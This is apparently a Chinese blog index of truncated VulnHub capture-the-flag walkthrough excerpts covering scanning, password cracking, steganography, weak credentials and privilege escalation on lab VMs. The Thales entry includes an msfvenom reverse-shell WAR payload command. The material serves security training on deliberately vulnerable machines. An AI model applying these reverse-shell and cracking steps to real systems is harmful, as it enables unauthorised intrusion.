VulnHub Vikings:1
2026-06-10 720 字 4 分钟

VulnHub Vikings:1

Vikings:1项目地址:https://download.vulnhub.com/vikings/Vikings.ova 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 CTFBinwalk访问首页 扫描目录有个 war.txt 文件,访问是一个路径 拼接在后面访问是很大段编码 解码是一个压缩文件 但是要求输入密码 破解出来是 ragnarok123,得到一张图片 用 Binwalk 识别出里面的压缩包 加上 -e 参数解压缩出来 查看文件拿到用户名密码 1floki:f@m0usboatbuilde
VulnHub Beelzebub:1
2026-06-10 1.9k 字 12 分钟

VulnHub Beelzebub:1

Beelzebub:1博客地址:https://www.cnblogs.com/jason-huawen/p/16941009.html(该靶机网络连接很不稳定,懒得打了) 项目地址:https://download.vulnhub.com/beelzebub/Beelzebub.zip 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 1234567891011121314151617181920┌──(kali㉿kali)-[~/Vulnhub/Beezlebub]└─$ sudo nmap -sS -sV -sC -
VulnHub Deathnote:1
2026-06-10 172 字 1 分钟

VulnHub Deathnote:1

Deathnote:1项目地址:https://download.vulnhub.com/deathnote/Deathnote.ova 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 弱口令SSH访问 80 端口会自动跳转到一个域名 把域名添加到 HOSTS 中 随后可以正常访问 扫描后台找到一个用户名字典 notes.txt 中则是密码字典 爆破出用户名密码 1l:death4me 登录成功 提权敏感信息泄露在 /opt 目录中拿到 kira 用户的提示 解密得到账号密码 切换用户 /
VulnHub doubletrouble:1
2026-06-09 1.1k 字 6 分钟

VulnHub doubletrouble:1

Dripping doubletrouble:1项目地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 NMap 扫描出开放服务及系统版本 访问 80 端口需要登录 CTFStegseek 隐写扫描后台发现 /secrt 目录 访问得到一张图片 使用 Stegseek 提取出隐藏文件,在其中找到了用户名密码 12otisrush@localhost.comotis666 弱口令qdPM Login登录成功 RCEqdPM 9.
VulnHub Dripping Blues:1
2026-06-09 609 字 3 分钟

VulnHub Dripping Blues:1

Dripping Blues:1项目地址:https://download.vulnhub.com/drippingblues/drippingblues.ova 是一个打包好的镜像文件 注意:导入 ovf 时一定要选择我已移动,否则没网 使用无影扫描出开放服务及系统版本 文件包含drip访问 80 端口首页没东西,扫描出 robots.txt 文件 这里提示 SSH 连接密码,但试过了没用 匿名访问 FTP 服务有一个压缩文件,爆破出密码是 072528035 解压之后获得 respectmydrip.txt 文件和 secret.zip 文件 respectmydrip.txt 文
VulnHub Corrosion:2
2026-06-09 521 字 3 分钟

VulnHub Corrosion:2

Corrosion:2博客地址:https://medium.com/@ozkirdenizenes/vulnhub-corrosion-2-walkthrough-c3e2f6057574 项目地址:https://download.vulnhub.com/digitalworld/ELECTRICAL.7z(占用太大懒得下) 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 敏感信息泄露backup.zip访问 8080 端口是 Tomcat 扫描目录发现 /backup.zip 解压需要密码 提取出哈希值
VulnHub digitalworld.local:electrical
2026-06-09 1.5k 字 9 分钟

VulnHub digitalworld.local:electrical

digitalworld.local:electrical博客地址:https://novasky.medium.com/digitalworld-local-development-walkthrough-vulnhub-story-of-obscurity-oscp-practice-5f52486f581b 项目地址:https://download.vulnhub.com/digitalworld/ELECTRICAL.7z(占用太大懒得下) 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 12345678910
VulnHub ICA:1
2026-06-08 240 字 1 分钟

VulnHub ICA:1

ICA:1项目地址:https://download.vulnhub.com/ica/ica1.zip 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 敏感信息泄露qdPM 9.2 - Password Exposure访问网页,运行的是 qdPM 9.2 找到一个密码泄露的 NDay 查看文件内容是让我们访问一个路径 访问过去拿到数据库账号密码 弱口令MySQL远程连接数据库 SSH在数据库中翻出用户名密码 最终确认这组用户名密码可以登录 SSH 提权SUID 提权找到一个 SUID 文件 直接运行好
VulnHub Thales:1
2026-06-08 210 字 1 分钟

VulnHub Thales:1

Thales: 1项目地址:https://download.vulnhub.com/thales/Thales.zip 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 弱口令Tomcat可以看到 8080 开放了 Tomcat,使用 MSF 爆破 成功爆破出密码 1tomcat:role1 RCEWAR 包部署登录进去后可以上传 WAR 包 MSF 生成一个 1msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.4 LPORT=8888 -f wa
VulnHub Napping:1.0.1
2026-06-08 408 字 2 分钟

VulnHub Napping:1.0.1

Napping:1.0.1博客原地址:https://readysetexploit.gitlab.io/home/vulnhub/napping/(靶机没部署好) 项目地址:https://download.vulnhub.com/napping/napping-1.0.1.ova 是一个打包好的镜像文件 注意:导入 ova 时一定要选择我已移动,否则没网 使用 Nmap 扫描出开放服务及操作系统版本 重定向漏洞Blog Link访问网页要求登录 接下来,我们创建一个账户,用户名和密码随意 登录后,我们会看到一个免费的博客推广网站 看起来我们可以提交链接,提交后,链接就会显示在网站上供